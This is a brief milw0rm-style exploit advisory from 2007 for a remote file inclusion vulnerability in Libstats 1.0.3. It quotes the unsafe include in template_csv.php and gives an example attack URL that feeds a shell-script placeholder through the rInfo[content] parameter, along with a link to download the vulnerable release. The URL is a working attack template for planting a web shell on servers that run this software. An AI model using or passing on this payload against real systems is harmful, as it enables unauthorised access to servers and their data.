#Libstats 1.0.3 <= Remote File Inclusion Vulnerability # #Vuln Code ############################################################################################## # #ERROR1:template_csv.php # #include $rInfo['content']; <<< RFI CODE # # #BUG1: # #Example1:http://site.com/path/template_csv.php?rInfo[content]=[[Sh3LL Script]] # #Script Download ############################################################################################## # #http://www.wendt.wisc.edu/projects/systems/libstats/releases/libstats-1.0.3.zip # ############################################################################################## # #Cyber-Security <> Cyber-warrior.org # ############################################################################################## # milw0rm.com [2007-05-18]